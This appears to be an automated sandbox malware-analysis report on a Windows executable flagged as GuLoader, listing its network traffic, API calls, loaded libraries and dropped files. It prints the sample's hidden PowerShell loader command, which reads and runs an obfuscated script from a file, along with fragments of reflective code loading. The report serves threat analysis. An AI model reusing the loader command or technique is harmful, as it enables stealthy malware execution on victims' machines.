    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49260
    Source: unknownNetwork traffic detected: HTTP traffic on port 49332 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49336 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49313 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49329 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49218
    Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49337
    Source: unknownNetwork traffic detected: HTTP traffic on port 49327 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49336
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49335
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49334
    Source: unknownNetwork traffic detected: HTTP traffic on port 49323 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49333
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49332
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49331
    Source: unknownNetwork traffic detected: HTTP traffic on port 49297 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49297
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49330
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49251
    Source: unknownNetwork traffic detected: HTTP traffic on port 49319 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49333 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49337 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49316 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49276 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49312 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49322 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49209
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49329
    Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49328
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49327
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49326
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49325
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49324
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49323
    Source: unknownNetwork traffic detected: HTTP traffic on port 49324 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49289
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49322
    Source: unknownNetwork traffic detected: HTTP traffic on port 49330 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49321
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49243
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49320
    Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49283
    Source: unknownNetwork traffic detected: HTTP traffic on port 49318 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49209 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49315 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49321 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49319
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49318
    Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49317
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49316
    Source: unknownNetwork traffic detected: HTTP traffic on port 49243 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49315
    Source: unknownNetwork traffic detected: HTTP traffic on port 49268 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49314
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49313
    Source: unknownNetwork traffic detected: HTTP traffic on port 49325 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49235
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49312
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49276
    Source: unknownNetwork traffic detected: HTTP traffic on port 49289 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49331 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49317 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49335 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49314 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49328 -> 443
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49202 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49209 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49251 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49268 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49283 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49314 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49324 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49326 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49328 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49330 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49332 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49334 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49336 version: TLS 1.2
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040571B

    System Summary

    barindex
    Powershell drops PE file
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Anthranil.exeJump to dropped file
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_00406DC60_2_00406DC6
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_0040759D0_2_0040759D
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dll 01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
    Source: AM983ebb5F.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.evad.winEXE@6/13@2/2
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049C7
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
    Source: C:\Users\user\Desktop\AM983ebb5F.exeFile created: C:\Users\user\AppData\Roaming\erstatningsgradenJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03
    Source: C:\Users\user\Desktop\AM983ebb5F.exeFile created: C:\Users\user\AppData\Local\Temp\nsiD328.tmpJump to behavior
    Source: AM983ebb5F.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
    Source: C:\Users\user\Desktop\AM983ebb5F.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: AM983ebb5F.exeReversingLabs: Detection: 50%
    Source: AM983ebb5F.exeVirustotal: Detection: 69%
    Source: C:\Users\user\Desktop\AM983ebb5F.exeFile read: C:\Users\user\Desktop\AM983ebb5F.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\AM983ebb5F.exe "C:\Users\user\Desktop\AM983ebb5F.exe"
    Source: C:\Users\user\Desktop\AM983ebb5F.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Anthranil.exe "C:\Users\user\AppData\Local\Temp\Anthranil.exe"
    Source: C:\Users\user\Desktop\AM983ebb5F.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Anthranil.exe "C:\Users\user\AppData\Local\Temp\Anthranil.exe"Jump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: AM983ebb5F.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: Anthranil.exe, 00000006.00000001.2413832004.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: mshtml.pdbUGP source: Anthranil.exe, 00000006.00000001.2413832004.0000000000649000.00000020.00000001.01000000.00000006.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000006.00000002.3009478955.000000000363A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
    Found suspicious powershell code related to unpacking or dynamic code loading
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Hanukkah $Vrftets $Frostproof), (Gaussbergite @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:gebyrobjekt = [AppDomain]::CurrentDomain.GetAssemblies()$glob
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Forlydendes)), $udkobler).DefineDynamicModule($Prdikeners, $false).DefineType($Dukkerne, $biethnic, [System.MulticastDelegate])$Gerhar
    Suspicious powershell command line found
    Source: C:\Users\user\Desktop\AM983ebb5F.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "
    Source: C:\Users\user\Desktop\AM983ebb5F.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) "Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Anthranil.exeJump to dropped file
    Source: C:\Users\user\Desktop\AM983ebb5F.exeFile created: C:\Users\user\AppData\Local\Temp\nsuD53D.tmp\nsExec.dllJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Users\user\Desktop\AM983ebb5F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
